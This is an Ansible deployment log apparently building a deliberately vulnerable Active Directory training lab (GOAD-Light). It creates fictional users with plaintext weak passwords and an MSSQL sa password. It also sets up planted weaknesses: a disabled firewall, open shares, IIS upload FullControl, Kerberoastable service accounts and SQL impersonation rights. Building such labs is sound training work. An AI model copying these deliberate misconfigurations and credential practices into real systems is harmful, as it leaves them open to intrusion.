ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Trusts configuration prepare] ************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [Trusts configuration] ********************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [Trusts configuration end] ****************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [Adjust DNS conditional forwarded configuration] ******************************************************************************************************************************************************
skipping: no hosts matched

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=6    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-data.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini ad-data.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [DCs AD data configuration] ***************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: password_policy : set password policy on dc01]
 [started TASK: password_policy : set password policy on dc02]

TASK [password_policy : set password policy] ***************************************************************************************************************************************************************
changed: [dc02]
changed: [dc01]
 [started TASK: ad : Ensure Administrator is part of Domain Admins on dc01]
 [started TASK: ad : Ensure Administrator is part of Domain Admins on dc02]

TASK [ad : Ensure Administrator is part of Domain Admins] **************************************************************************************************************************************************
ok: [dc02]
ok: [dc01]
 [started TASK: ad : Create OU on dc01]
 [started TASK: ad : Create OU on dc02]

TASK [ad : Create OU] **************************************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'Vale', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'IronIslands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Riverlands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Crownlands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Stormlands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Westerlands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Reach', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Dorne', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
 [started TASK: ad : Create Groups Universal on dc01]
 [started TASK: ad : Create Groups Universal on dc02]
 [started TASK: ad : Create Groups Global on dc01]
 [started TASK: ad : Create Groups Global on dc02]

TASK [ad : Create Groups Global] ***************************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'Lannister', 'value': {'managed_by': 'tywin.lannister', 'path': 'OU=Westerlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Stark', 'value': {'managed_by': 'eddard.stark', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Baratheon', 'value': {'managed_by': 'robert.baratheon', 'path': 'OU=Stormlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Night Watch', 'value': {'managed_by': 'jeor.mormont', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Small Council', 'value': {'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Mormont', 'value': {'managed_by': 'jeor.mormont', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'DragonStone', 'value': {'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'KingsGuard', 'value': {'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'DragonRider', 'value': {'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
 [started TASK: ad : Create Groups domainlocal on dc01]
 [started TASK: ad : Create Groups domainlocal on dc02]

TASK [ad : Create Groups domainlocal] **********************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'AcrossTheNarrowSea', 'value': {'path': 'CN=Users,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'AcrossTheSea', 'value': {'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
 [started TASK: ad : Sync the contents of one directory to another - hack to get Requires -Module Ansible.ModuleUtils.Legacy loaded on dc01]
 [started TASK: ad : Sync the contents of one directory to another - hack to get Requires -Module Ansible.ModuleUtils.Legacy loaded on dc02]

TASK [ad : Sync the contents of one directory to another - hack to get Requires -Module Ansible.ModuleUtils.Legacy loaded] *********************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: ad : Create users on dc01]
 [started TASK: ad : Create users on dc02]

TASK [ad : Create users] ***********************************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'tywin.lannister', 'value': {'firstname': 'Tywin', 'surname': 'Lanister', 'password': 'powerkingftw135', 'city': 'Casterly Rock', 'description': 'Tywin Lanister', 'groups': ['Lannister'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'arya.stark', 'value': {'firstname': 'Arya', 'surname': 'Stark', 'password': 'Needle', 'city': 'Winterfell', 'description': 'Arya Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'jaime.lannister', 'value': {'firstname': 'Jaime', 'surname': 'Lanister', 'password': 'cersei', 'city': "King's Landing", 'description': 'Jaime Lanister', 'groups': ['Lannister'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'eddard.stark', 'value': {'firstname': 'Eddard', 'surname': 'Stark', 'password': 'FightP3aceAndHonor!', 'city': "King's Landing", 'description': 'Eddard Stark', 'groups': ['Stark', 'Domain Admins'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'cersei.lannister', 'value': {'firstname': 'Cersei', 'surname': 'Lanister', 'password': 'il0vejaime', 'city': "King's Landing", 'description': 'Cersei Lanister', 'groups': ['Lannister', 'Baratheon', 'Domain Admins', 'Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'catelyn.stark', 'value': {'firstname': 'Catelyn', 'surname': 'Stark', 'password': 'robbsansabradonaryarickon', 'city': "King's Landing", 'description': 'Catelyn Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'tyron.lannister', 'value': {'firstname': 'Tyron', 'surname': 'Lanister', 'password': 'Alc00L&S3x', 'city': "King's Landing", 'description': 'Tyron Lanister', 'groups': ['Lannister'], 'path': 'OU=Westerlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'robb.stark', 'value': {'firstname': 'Robb', 'surname': 'Stark', 'password': 'sexywolfy', 'city': 'Winterfell', 'description': 'Robb Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'robert.baratheon', 'value': {'firstname': 'Robert', 'surname': 'Baratheon', 'password': 'iamthekingoftheworld', 'city': "King's Landing", 'description': 'Robert Lanister', 'groups': ['Baratheon', 'Domain Admins', 'Small Council', 'Protected Users'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'sansa.stark', 'value': {'firstname': 'Sansa', 'surname': 'Stark', 'password': '345ertdfg', 'city': 'Winterfell', 'description': 'Sansa Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['HTTP/eyrie.north.sevenkingdoms.local']}})
changed: [dc01] => (item={'key': 'joffrey.baratheon', 'value': {'firstname': 'Joffrey', 'surname': 'Baratheon', 'password': '1killerlion', 'city': "King's Landing", 'description': 'Joffrey Baratheon', 'groups': ['Baratheon', 'Lannister'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'brandon.stark', 'value': {'firstname': 'Brandon', 'surname': 'Stark', 'password': 'iseedeadpeople', 'city': 'Winterfell', 'description': 'Brandon Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'renly.baratheon', 'value': {'firstname': 'Renly', 'surname': 'Baratheon', 'password': 'lorastyrell', 'city': "King's Landing", 'description': 'Renly Baratheon', 'groups': ['Baratheon', 'Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'rickon.stark', 'value': {'firstname': 'Rickon', 'surname': 'Stark', 'password': 'Winter2022', 'city': 'Winterfell', 'description': 'Rickon Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'stannis.baratheon', 'value': {'firstname': 'Stannis', 'surname': 'Baratheon', 'password': 'Drag0nst0ne', 'city': "King's Landing", 'description': 'Stannis Baratheon', 'groups': ['Baratheon', 'Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'hodor', 'value': {'firstname': 'hodor', 'surname': 'hodor', 'password': 'hodor', 'city': 'Winterfell', 'description': 'Brainless Giant', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'petyer.baelish', 'value': {'firstname': 'Petyer', 'surname': 'Baelish', 'password': '@littlefinger@', 'city': "King's Landing", 'description': 'Petyer Baelish', 'groups': ['Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'jon.snow', 'value': {'firstname': 'Jon', 'surname': 'Snow', 'password': 'iknownothing', 'city': 'Castel Black', 'description': 'Jon Snow', 'groups': ['Stark', 'Night Watch'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['HTTP/thewall.north.sevenkingdoms.local']}})
changed: [dc01] => (item={'key': 'lord.varys', 'value': {'firstname': 'Lord', 'surname': 'Varys', 'password': '_W1sper_$', 'city': "King's Landing", 'description': 'Lord Varys', 'groups': ['Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'samwell.tarly', 'value': {'firstname': 'Samwell', 'surname': 'Tarly', 'password': 'Heartsbane', 'city': 'Castel Black', 'description': 'Samwell Tarly (Password : Heartsbane)', 'groups': ['Night Watch'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'maester.pycelle', 'value': {'firstname': 'Maester', 'surname': 'Pycelle', 'password': 'MaesterOfMaesters', 'city': "King's Landing", 'description': 'Maester Pycelle', 'groups': ['Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'jeor.mormont', 'value': {'firstname': 'Jeor', 'surname': 'Mormont', 'password': '_L0ngCl@w_', 'city': 'Castel Black', 'description': 'Jeor Mormont', 'groups': ['Night Watch', 'Mormont'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'sql_svc', 'value': {'firstname': 'sql', 'surname': 'service', 'password': 'YouWillNotKerboroast1ngMeeeeee', 'city': '-', 'description': 'sql service', 'groups': [], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['MSSQLSvc/castelblack.north.sevenkingdoms.local:1433', 'MSSQLSvc/castelblack.north.sevenkingdoms.local']}})
 [started TASK: ad : Set users SPN lists on dc01]
 [started TASK: ad : Set users SPN lists on dc02]

TASK [ad : Set users SPN lists] ****************************************************************************************************************************************************************************
changed: [dc02] => (item={'key': 'sansa.stark', 'value': {'firstname': 'Sansa', 'surname': 'Stark', 'password': '345ertdfg', 'city': 'Winterfell', 'description': 'Sansa Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['HTTP/eyrie.north.sevenkingdoms.local']}})
changed: [dc02] => (item={'key': 'jon.snow', 'value': {'firstname': 'Jon', 'surname': 'Snow', 'password': 'iknownothing', 'city': 'Castel Black', 'description': 'Jon Snow', 'groups': ['Stark', 'Night Watch'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['HTTP/thewall.north.sevenkingdoms.local']}})
changed: [dc02] => (item={'key': 'sql_svc', 'value': {'firstname': 'sql', 'surname': 'service', 'password': 'YouWillNotKerboroast1ngMeeeeee', 'city': '-', 'description': 'sql service', 'groups': [], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['MSSQLSvc/castelblack.north.sevenkingdoms.local:1433', 'MSSQLSvc/castelblack.north.sevenkingdoms.local']}})
 [started TASK: ad : Assign managed_by domainlocal groups on dc01]
 [started TASK: ad : Assign managed_by domainlocal groups on dc02]
 [started TASK: ad : Assign managed_by universal groups on dc01]
 [started TASK: ad : Assign managed_by universal groups on dc02]
 [started TASK: ad : Assign managed_by global groups on dc01]
 [started TASK: ad : Assign managed_by global groups on dc02]

TASK [ad : Assign managed_by global groups] ****************************************************************************************************************************************************************
changed: [dc02] => (item={'key': 'Stark', 'value': {'managed_by': 'eddard.stark', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Lannister', 'value': {'managed_by': 'tywin.lannister', 'path': 'OU=Westerlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Night Watch', 'value': {'managed_by': 'jeor.mormont', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Baratheon', 'value': {'managed_by': 'robert.baratheon', 'path': 'OU=Stormlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Mormont', 'value': {'managed_by': 'jeor.mormont', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
 [started TASK: ad : Add members to the Universal group, preserving existing membership on dc01]
 [started TASK: ad : Add members to the Universal group, preserving existing membership on dc02]
 [started TASK: ad : Add members to the Global group, preserving existing membership on dc01]
 [started TASK: ad : Add members to the Global group, preserving existing membership on dc02]
 [started TASK: ad : Add members to the Domainlocal group, preserving existing membership on dc01]
 [started TASK: ad : Add members to the Domainlocal group, preserving existing membership on dc02]

PLAY [Servers AD data configuration] ***********************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: settings/copy_files : Create directory on srv02]

TASK [settings/copy_files : Create directory] **************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: settings/copy_files : Download GOAD img in C:\tmp on srv02]

TASK [settings/copy_files : Download GOAD img in C:\tmp] ***************************************************************************************************************************************************
changed: [srv02]

PLAY [Move to OU] ******************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: move_to_ou : Move computer to OU on dc01]
 [started TASK: move_to_ou : Move computer to OU on dc02]

TASK [move_to_ou : Move computer to OU] ********************************************************************************************************************************************************************
ok: [dc02] => (item={'key': 'srv02', 'value': {'hostname': 'castelblack', 'type': 'server', 'local_admin_password': 'NgtI75cKV+Pu', 'domain': 'north.sevenkingdoms.local', 'path': 'DC=north,DC=sevenkingdoms,DC=local', 'use_laps': False, 'local_groups': {'Administrators': ['north\\jeor.mormont'], 'Remote Desktop Users': ['north\\Night Watch', 'north\\Mormont', 'north\\Stark']}, 'scripts': [], 'vulns': ['directory', 'disable_firewall', 'openshares', 'files', 'permissions'], 'vulns_vars': {'directory': {'shares': 'C:\\shares', 'all': 'C:\\shares\\all'}, 'files': {'website': {'src': 'srv02/wwwroot', 'dest': 'C:\\inetpub\\'}, 'letter_in_shares': {'src': 'srv02/all/arya.txt', 'dest': 'C:\\shares\\all\\arya.txt'}}, 'permissions': {'IIS_IUSRS_upload': {'path': 'C:\\inetpub\\wwwroot\\upload', 'user': 'IIS_IUSRS', 'rights': 'FullControl'}}}, 'mssql': {'sa_password': 'Sup1_sa_P@ssw0rd!', 'svcaccount': 'sql_svc', 'sysadmins': ['NORTH\\jon.snow'], 'executeaslogin': {'NORTH\\samwell.tarly': 'sa', 'NORTH\\brandon.stark': 'NORTH\\jon.snow'}, 'executeasuser': {'arya_master_dbo': {'user': 'NORTH\\arya.stark', 'db': 'master', 'impersonate': 'dbo'}, 'arya_dbms_dbo': {'user': 'NORTH\\arya.stark', 'db': 'msdb', 'impersonate': 'dbo'}}}}})

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=16   changed=6    unreachable=0    failed=0    skipped=9    rescued=0    ignored=0   
dc02                       : ok=12   changed=6    unreachable=0    failed=0    skipped=7    rescued=0    ignored=0   
srv02                      : ok=4    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-gmsa.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini ad-gmsa.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [GMSA inside AD] **************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc02]
ok: [dc01]
 [started TASK: gmsa : Create GMSA Account on dc01]
 [started TASK: gmsa : Create GMSA Account on dc02]

PLAY [GMSA hosts] ******************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: gmsa_hosts : Install-WindowsFeature RSAT-AD-PowerShell on srv02]
 [started TASK: gmsa_hosts : Install ADServiceAccount on srv02]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=7    changed=0    unreachable=0    failed=0    skipped=2    rescued=0    ignored=0   
dc02                       : ok=2    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
srv02                      : ok=2    changed=0    unreachable=0    failed=0    skipped=2    rescued=0    ignored=0   

[*] Run playbook : laps.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini laps.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [configure laps on DCs] *******************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [configure laps on servers] ***************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [verify and show laps passwords] **********************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [set laps users and groups permission] ****************************************************************************************************************************************************************
skipping: no hosts matched

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=6    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-relations.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini ad-relations.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Adjust rights configuration] *************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: settings/adjust_rights : Add domain users to local groups on dc01]
 [started TASK: settings/adjust_rights : Add domain users to local groups on dc02]
 [started TASK: settings/adjust_rights : Add domain users to local groups on srv02]

TASK [settings/adjust_rights : Add domain users to local groups] *******************************************************************************************************************************************
changed: [srv02] => (item={'key': 'Administrators', 'value': ['north\\jeor.mormont']})
